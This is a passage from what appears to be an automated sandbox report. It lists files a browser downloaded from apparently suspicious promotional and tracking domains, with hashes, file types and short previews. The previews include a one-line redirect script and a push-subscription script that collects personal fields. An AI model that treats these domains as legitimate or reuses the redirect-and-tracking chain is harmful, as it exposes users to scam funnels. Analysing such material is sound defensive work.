                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):1038
                                                                                        Entropy (8bit):4.712164195780134
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4539707A75374A2E62B50ED0D6074ED5
                                                                                        SHA1:49A0E98869D23F24312EB6AB702CFF5464E7F9FE
                                                                                        SHA-256:7836FF503052A017BE7B80D1C6E49C03A637513C75B8A3286DE924073E4AAB80
                                                                                        SHA-512:FAB55E26114CE4829A0ADF4993FDCB616ACCA14196F39709F9B4766A366F267EBC84B32F520E791E1F319EF5CABFB54F6348953352662F162C9B61468397F326
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/css/popup.css
                                                                                        Preview:#app_common_modal .app_modal_body iframe {.. min-height: 344px;..}..#app_common_modal .app_modal_body {.. min-height: auto;.. margin: auto;.. top: 50%;.. transform: translateY(-50%);..}..#app_common_modal,..#error_handler_overlay {.. overflow-y: hidden !important;..}..#app_common_modal_close,..#error_handler_overlay_close {.. line-height: 26px;..}..#error_handler_overlay .error_handler_body ul{.. padding: 0;.. margin: 0;..}..@media only screen and (min-device-width : 320px) and (max-device-width : 991px) and (orientation : landscape) {.. #app_common_modal .app_modal_body {.. min-height: 280px;.. }.. #app_common_modal .app_modal_body iframe {.. min-height: 242px;.. }.. #error_handler_overlay .error_handler_body ul {.. padding: 0;.. margin: 0;.. height: 200px;.. overflow-y: scroll;.. }..}..@media screen and (max-device-width : 767px) {.. #error_handler_overlay .error_handler_body ul {.. paddi
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (62961)
                                                                                        Category:downloaded
                                                                                        Size (bytes):63240
                                                                                        Entropy (8bit):5.122547437385465
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F20FA8B102F205141295CDEFD6FFE449
                                                                                        SHA1:0C4E8445F6F0C9611DC1C13DC6F085EB4BCACA0B
                                                                                        SHA-256:D8968086F7509DF34C3278563DAB87399DA4F9DCDFB419818E3A309EEDC70B88
                                                                                        SHA-512:F2A9A2B37D4E422EA121182F921B74B3A9823A2B6D8CC6BD18CAAD2BD85EB39884401404FC26BAC8613916C5B7EAFCA2A46A1642CC018FF4019B6251D3CE9193
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/vendors/bootstrap-4.5.3/js/bootstrap.min.js
                                                                                        Preview:/*!. * Bootstrap v4.5.3 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var o=i(e),a=i(n);function s(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function l(t,e,n){return e&&s(t.prototype,e),n&&s(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.p
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):135
                                                                                        Entropy (8bit):4.971125879592493
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:0D754CBFF4833546C7BEEFA64AAFA9FC
                                                                                        SHA1:59E4F88216F951BB4FC461F75B0C1AA5C4218531
                                                                                        SHA-256:E049D71EF8B304AB506F857A89A84DD714CD4F90E581CEA04501B33898DC0999
                                                                                        SHA-512:184C985C756B2CDD2DD2108AFAF7B96825F6D3327A72B42A967DC496AA3C576C0A38F7B6EFAE54F142226A4F2DE733ACEF68BF0F002DD93C99D04722C429F8E2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://imputeletter.com/0/0/0/335e1048d039c715a3b82792e2127aad/13/139-8761/964-18418-15995
                                                                                        Preview:<script type="text/javascript">window.location.href="https://qwartiqpin.online/?s1=351518&s2=1179320732&s3=6019&s4=1&s10=3307"</script>
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (1739), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):1817
                                                                                        Entropy (8bit):4.938855787215722
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:9FDEAD4434E9B7FE1F2E550B87E23632
                                                                                        SHA1:560211F3156F7F2A28EF030C4974555E509373FB
                                                                                        SHA-256:C51C2E870BE21B6BD85F42DA16AE8E52AB4BD3119544F9F6364203543F023F8A
                                                                                        SHA-512:414A8C3EE2250EDDB3E914EF094165EC2B45D520069F0CEF7D3D1DAE4BBCDB224754B08098841876BCBAF9A42AA3A485799B08AEB7835AFBEFAAA2A6987F0B8C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/css/normalize.min.css
                                                                                        Preview:/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */..html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-m
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (5360), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):5360
                                                                                        Entropy (8bit):4.99121776502652
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:7E5FC25BA3C5A4A49B4FACA631F60444
                                                                                        SHA1:47B1F08BF84EC87827A8EAC9FAFEC6C37E4FDE5F
                                                                                        SHA-256:CAD22C4685B2D6276885B03652730AE89559F49118534962631B428D3F3F99AD
                                                                                        SHA-512:C2A02D814DE1DBB45A3D7E3034DA5FE8E6638E7F9775AD87196118E445FDF970FA93F0491154BD043C15B158978ACD8E4383CBEE27FE78178BA988B5F98EDE8F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/mmenu/mmenu-light.js
                                                                                        Preview:!function(t){var e={};function n(o){if(e[o])return e[o].exports;var s=e[o]={i:o,l:!1,exports:{}};return t[o].call(s.exports,s,s.exports,n),s.l=!0,s.exports}n.m=t,n.c=e,n.d=function(t,e,o){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var s in t)n.d(o,s,function(e){return t[e]}.bind(null,s));return o},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=0)}([function(t,e,n){"use strict";n.r(e);var o=function(){function t(t){var e=this;this.liste
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                        Category:downloaded
                                                                                        Size (bytes):15406
                                                                                        Entropy (8bit):1.4037136087364375
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:9E3E8B6D89D426AD950F5144D15921E6
                                                                                        SHA1:6CEFE5C7CA4A97D2118FB849F37F4FFA4F9F0EE0
                                                                                        SHA-256:703063F5CFEBF76BD6190DD87052D6664D3A0FCF474D837D89F6B7FAE7A8F3B5
                                                                                        SHA-512:A063BE8A7879B431338506AEA3975376F7ADDF2B9C01563F4AAEFDAA827C2568F76DA0B32BAE9665E09507C9CEBB44FABE6D194E5944E000FC299FA0A41F1C44
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/favicon.ico
                                                                                        Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ............................................................................................................................................................................ ...........Y............................................... ...................Y....................................... ...........................Y............................... ...................................Y...................................................................Z.......................................f...+.......................Y...............9...............g...........).......................Y...............<.......e...................).......................X...........................................*.......................L...........................................*...................t...............................................+...................................................................#...X..................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):311814
                                                                                        Entropy (8bit):5.023813193276034
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:857D963627C97AC63261855B019516D2
                                                                                        SHA1:722265D1CBC4276C7E08178F94EB7683A64DB391
                                                                                        SHA-256:FFAA91D42C110E4343B8004A56D2107387FC690E191B6E49AC3C8E4C30173E18
                                                                                        SHA-512:6C0004E211870737DFB0BE1C61BC5D2DD27880755B8776EB30D96669EC0DF89E0D602285D871E210D2484193AFC524BE4B998BAC23A0EDA9BC7F6B386ECA451F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/css/industry-now.min.css
                                                                                        Preview::root{--red-theme-color:#cc1011;--navy-theme-color:#0c1c31;--light-navy-theme-color:#162f50;--gray-800-theme-color:#1d2939;--gray-300-theme-color:#d0d5dd;--gray-400-theme-color:#98a3b3;--gray-200-theme-color:#f5f5f5;--light-grey-theme-color:#eaecf0;--light-blue-theme-color:#b2ddff;--hero-image-overlay-red:rgba(204,16,17,.9);--hero-image-overlay-light-red:rgba(204,16,17,.8);--color-ui-background-navy:#051e33;--color-ui-background-grey:#f1f1f1;--color-ui-background-grey-light:#f5f5f5;--color-ui-background-light-grey:#fcfcfc;--ui-primary-button-hover-pink:#fdecea;--ui-primary-text-grey:#344054;--ui-primary-navigation-red:#eb3636;--ui-primary-deep-blue:#0c1c31;--ui-data-light-grey:#f9f9fa;--ui-data-medium-medium-grey:#eceff1;--ui-data-medium-grey:#ebebeb;--ui-data-medium-light-grey:#f9fafb;--ui-data-dark-grey:#6f7174;--ui-data-extra-dark-grey:#5a5c5e;--ui-data-border:#d9d9d9;--ui-carts-diverging-01-deep-indigo:#104080;--palette-grey-500:#607d8b;--palette-blue:#8fc9f9;--palette-light-blue:#
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x54, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):2061
                                                                                        Entropy (8bit):7.302563697030639
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4F0466A225DD7C537286F0F6A4D0F4F7
                                                                                        SHA1:2C6B1890181F4EE336B2EFF506FAA125AC1C25B8
                                                                                        SHA-256:E1D0E1ECF55BD3FED22FEC6E1C49B61DEE714D548DD31B42D6B693596F3BDF75
                                                                                        SHA-512:134D68FA802E3F9D3A2C795B9EE3CF32D803E8792254B30AEFAF5A377587AA2CB89C8E5D3EAB868C2DF3B0AB70AEEA06F79BA143989B88F879993C0F1BD84695
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/images/ci15.jpg
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:1B98512E8B8011EDADFB84B1D551E38A" xmpMM:DocumentID="xmp.did:1B98512F8B8011EDADFB84B1D551E38A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1B98512C8B8011EDADFB84B1D551E38A" stRef:documentID="xmp.did:1B98512D8B8011EDADFB84B1D551E38A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):482
                                                                                        Entropy (8bit):4.8727817622409235
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:5EDA11791EDDD0429644EA1C8799F06E
                                                                                        SHA1:10A58E76CDBD3E4D189949C1BAD621C4A9B44900
                                                                                        SHA-256:56D5A03BD0C26346B381E0507F8CF0D33B5A8D2C6FFB272F45451171DF9A6212
                                                                                        SHA-512:83985EF3B6F5C2BA73E4464D7B148DD64A3451389F52E651B1B4A02BD06610A85DFA8DCC210B84B61383A21A100DEEB94806120B498F97D6EC527AD4F27AA011
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-ie.svg
                                                                                        Preview:<svg width="17" height="11" viewBox="0 0 17 11" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M11 0H16.0575C16.2098 0 16.3334 0.123532 16.3334 0.275876V10.207C16.3334 10.3593 16.2098 10.4828 16.0575 10.4828H11V0Z" fill="#73AF00"/>..<path d="M11.0002 0H5.66675V10.4829H11.0002V0Z" fill="white"/>..<path d="M0.609129 0H5.66663V10.4828H0.609129C0.456784 10.4828 0.333252 10.3593 0.333252 10.2069V0.275845C0.333252 0.123501 0.456784 0 0.609129 0Z" fill="#FF9B55"/>..</svg>..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (8136)
                                                                                        Category:downloaded
                                                                                        Size (bytes):8137
                                                                                        Entropy (8bit):5.228541373357087
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:68B0D7CDD5088062F38E5806F78EEF66
                                                                                        SHA1:603FE1B6BCE40FC3FA112249205FAB2306BB4D69
                                                                                        SHA-256:CEE4873D995E33F02EA2E99A305001126F20784AB3BC7633061F4E9CDF61DF7F
                                                                                        SHA-512:90692359C29E0CA6F8971998C582DAE4C869FA08E1B448C8704E6ED9C9EC5698E735BFE51D8E697765A5FCCD58680DC65A7C163CAA51C935A8852634E57CC968
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://trk-adulvion.com/scripts/push/v9e118mez8
                                                                                        Preview:'use strict';const smPushApplicationServerPublicKey="BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=",smPushSiteId="v9e118mez8",smClientId="q2goykjdrv",serviceWorker="/service-worker.js";let smPushDomain="push.trk-adulvion.com",pushLogging=!0;const version=818;let smPushSubscriptionId,subscriptionDomain="subscription.trk-adulvion.com",eventDomain="event.trk-adulvion.com",sessionId="";const utmObj={mt:"",utm_source:"",utm_medium:"",utm_campaign:"",source_one:"",source_two:"",source_three:"",source_four:"",source_five:"",first_name:"",last_name:"",email:"",email_md5:"",zip_code:"",gender:"",age:""},taboolaUrl="https://api.taboola.com/2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412";function urlBase64ToUint8Array(a){const b="=".repeat((4-a.length%4)%4),c=(a+b).replace(/\-/g,"+").replace(/_/g,"/"),d=window.atob(c),e=new Uint8Array(d.length);for(let b=0;b<d.length;++b)e[b]=d.charCodeAt(b);return e}fu
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (631)
                                                                                        Category:downloaded
                                                                                        Size (bytes):517649
                                                                                        Entropy (8bit):5.713376874006511
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E2E79D6B927169D9E0E57E3BAECC0993
                                                                                        SHA1:1299473950B2999BA0B7F39BD5E4A60EAFD1819D
                                                                                        SHA-256:231336ED913A5EBD4445B85486E053CAF2B81CAB91318241375F3F7A245B6C6B
                                                                                        SHA-512:D6A2ED7B19E54D1447EE9BBC684AF7101B48086945A938A5F9B6AE74ACE30B9A98CA83D3183814DD3CC40F251AB6433DC7F8B425F313EA9557B83E1C2E035DFF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (2202)
                                                                                        Category:downloaded
                                                                                        Size (bytes):201344
                                                                                        Entropy (8bit):5.5305534901898685
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:85E6FEBD97A8C79E3034BF2F03179332
                                                                                        SHA1:056CD9900A1A720D103EF9200369F044B9E5334E
                                                                                        SHA-256:8E6DB6EB52BD2125251A23BCE37F4269B6F85C6DA8E4FBF329F084EFD7AB0965
                                                                                        SHA-512:F54475BC072A5CBC3B32D23FD89BF53183AC86031DC529E1ECC701A95184A16F5D628D938498256107D4DCFBFAE4CAA5C22BCE959EC47F7732F85A93D569B4D7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-NK3N874
                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__jsm","vtp_javascript":["template","(function(){return google_tag_manager[\"GTM-NK3N874\"].dataLayer.get(\"gtm.element\").parentElement.parentElement.querySelector(\"p.question\").innerText})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return google_tag_manager[\"GTM-NK3N874\"].dataLayer.get(\"gtm.element\").parentElement.querySelector(\"span.product_won\").innerText})();"]},{"function":"__u","vtp_component":"QUERY","vtp_queryKey":"s2","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_ena
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):2560
                                                                                        Entropy (8bit):4.217423480546109
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C3BA6521A7DEEB177F60026FE806DAE7
                                                                                        SHA1:3BE11EDC3841A03250D73F206C58DE8B23C54F41
                                                                                        SHA-256:EAB8B6FB51F1FA163160ADE5F94CE8AC81ED9DB0B99074E76466CA163906F2DF
                                                                                        SHA-512:49EC67C2A6C5814335EB9887FE1A5EFBC48C57AEC59CB55208AB0B7E64A690620236A2AA5C839410966CD653EA84E588B71BCC186741DD4FB769D185CF6387D7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-cn.svg
                                                                                        Preview:<svg width="16" height="12" viewBox="0 0 16 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M14.8017 0.758545H1.19828C0.536469 0.758545 0 1.29501 0 1.95683V10.0431C0 10.7049 0.536469 11.2414 1.19828 11.2414H14.8017C15.4635 11.2414 16 10.7049 16 10.0431V1.95683C16 1.29501 15.4635 0.758545 14.8017 0.758545Z" fill="#FF4B55"/>..<path d="M2.65638 2.39762L2.91938 3.18618L3.75063 3.19262C3.85826 3.19343 3.90288 3.3308 3.81629 3.39471L3.1476 3.88849L3.39832 4.68105C3.43076 4.78368 3.31394 4.86852 3.22638 4.80596L2.55013 4.32255L1.87388 4.80593C1.78632 4.86852 1.66951 4.78362 1.70194 4.68102L1.95266 3.88846L1.28397 3.39471C1.19738 3.33077 1.24201 3.19343 1.34963 3.19262L2.18088 3.18618L2.44388 2.39762C2.47794 2.29552 2.62235 2.29552 2.65638 2.39762Z" fill="#FFE15A"/>..<path d="M5.67475 2.59211L5.86334 2.84923L6.16769 2.75405C6.20709 2.74173 6.2395 2.78667 6.21538 2.82014L6.02906 3.07892L6.21363 3.33895C6.23753 3.37261 6.20481 3.41733 6.1655 3.40473L5.86178 3.30751L5.6715 3.56342C5
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):2190
                                                                                        Entropy (8bit):7.3517703261139635
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FC4D84CB209CA1B2E98B7AFBBAE76D36
                                                                                        SHA1:45B9BDE226277A75F3E1BD7E26D9C5CAA2178997
                                                                                        SHA-256:F8EA74221AC765638936628340AAF91D78B40A82277DE5A6C615B4C35A6F3B8B
                                                                                        SHA-512:0D8C67C466FAE0A892E5C6431EB1638C258DEBC8A19A818CF15EC93D91199B23B1A47B3DC9985A7381491D367BAE987347F9327F172144F19B0CB0D35D507B37
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:2E213FB68B7F11EDA5D78D0AFB59C9F2" xmpMM:InstanceID="xmp.iid:2E213FB58B7F11EDA5D78D0AFB59C9F2" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E60CA108B7F11ED9B8788B717D682FF" stRef:documentID="xmp.did:1E60CA118B7F11ED9B8788B717D682FF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 428 x 328, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):40514
                                                                                        Entropy (8bit):7.982702321799042
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:5C427C969795D7C0BA2F85274F3842E1
                                                                                        SHA1:B72988E7020A369BC3DEF81AE36974990D3E92E8
                                                                                        SHA-256:86F9856F0CAA166FE0EA315ED1E83715823730C4CE4B56C8FDB23233D15D62FB
                                                                                        SHA-512:51F701EA341BCE6FF29D314B557757A0C194DC5EB13D83D4F51BA94DD9CDE0AF46D985376BCF2FD0201A139EC30DFDC212DEF6B980F550FE7626547272B8D99E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://sc.ec424.com/uploaded/661e565c61d6e234cc004ba7/d/d39e303e8deddfd03266c5a0b30aa295.png
                                                                                        Preview:.PNG........IHDR.......H........8....sRGB....... .IDATx^..x.U.....tBH..Jh..]..}..o_].(*....uu.m.m.]{... ........23.../T).E...<>..;....9..3..)..."..(.........(..."....KM.E@.P...vA@.V..&.IE@.P...%Xj.(...".....J...0.N*..."..(.Rs@.P...E.].P....IuR.P...E@......"..(....v1L...."..(.J...P...E@.h...`..aR.T...E@.P..."..(..@. ...]..."..(....,5...E@.P....%X.b.T'..E@.P..`.9..(..."...(.j..:..(..."..K..E@.P...vA@.V..&.IE@.P...%Xj.(...".....J...0.N*..."..(.Rs@.P...E.].P....IuR.P...E@......"..(....v1L...."..(.J...P...E@.h...`..aR.T...E@.P..."..(..@. ...]..."..(....,5...E@.P....%X.b.T'..E@.P...`edd.0+..."..(..#...4.5t..`eeeMq.\J.Z3...E@.P.v1..XljCC..y..E.....`.f4.1.."...b....`.bc..W.P...vI@.V..6.iE@.P.v=.J.v.1WO..(..@.$...]..."..(....%X...'V...E.].P....MuZ.P...]....]o...+..."...(.j..:..(....G@..7....E@.h...`..aS.V...E`.#..k..s..."...K.J...N+..."...P...zbE@.P..%.?.`u)..s........"..(..@Yy....?..E...g.u.x.`m.1WWW...E.].x....q.E...5.\../.(.j.SIuZ.P....K..D.......KY]].P
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 140 x 60, 8-bit colormap, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):2512
                                                                                        Entropy (8bit):7.87279326567
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:9BFBDCDA6CE93717C3857B8A629488FE
                                                                                        SHA1:D53BD5D01D671D7A9411A37A597F91DBCC10C4D8
                                                                                        SHA-256:A0A2B4DECF654159B0B86D8F6DF05996D42BAF4ED8843AD81AAC101BC8494603
                                                                                        SHA-512:CA2FB36467AE5B630A2B0D413056A9500F9DFEB9842E10E17E86FF91FED5FA87C43B247990E81DB2EE9635787842CD6795E458A882FA85A459B58AC0608942F8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/images/secure3.png
                                                                                        Preview:.PNG........IHDR.......<.......y...vPLTE.....H...UST..Q .......Q...w." ........". ...KKK..c..=b``cbb................&"#..k..[..^0./<::..."!!..&%&...211..[)%&;79..h..w_\]<:;..q..LKK..:..............ZYY.....Y745..Q?<<&#$KHI$"#*((`^_lkk..iB@@pop.....JIIWUVPPP..xGFG...~}}..?.....L,*+igh......# !..n.........uxwx...GFF..........)(()%&.....BKHI..Axvv<:;..Wjii.........5........T....>MKL.....Sd..# !.....U..H...#. ..F..:...}.-.........z.).....J.....L...(&#..U..I........R..O..M........2w.$......J..7..Q............c..?u.#.....L..F..614%..P..Go.=..<AN,4:&............l..L..E..D..Bf.:Qh2r..........U{.B\w6Xr4;D).....}..s..]w.AM`/GX-l....B..-..-...e.|...~tRNS.............1...>.1.<8#......xV%............}vYN;2%...........}jfbbSGA51............{o]YWIGB............pmjfaQ...{^NC2..`s....IDATh..wS.A.._Q...Q.A....+..{...{r...r.......J..o.n.$ ct2..#.L.f.2....{s.... @...;..n..{.n...!..V.~.*.K$...].....zN)..0.....d.1.-)..2.....D.*..A?..C]esu..P.Tw....:...+C.FSS..uaa.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):99232
                                                                                        Entropy (8bit):5.363052522635992
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:7F576C401E20B9725D2CD3A831BDCE83
                                                                                        SHA1:C0AA1F1370914255F3DCE602DF954D670DDC1A07
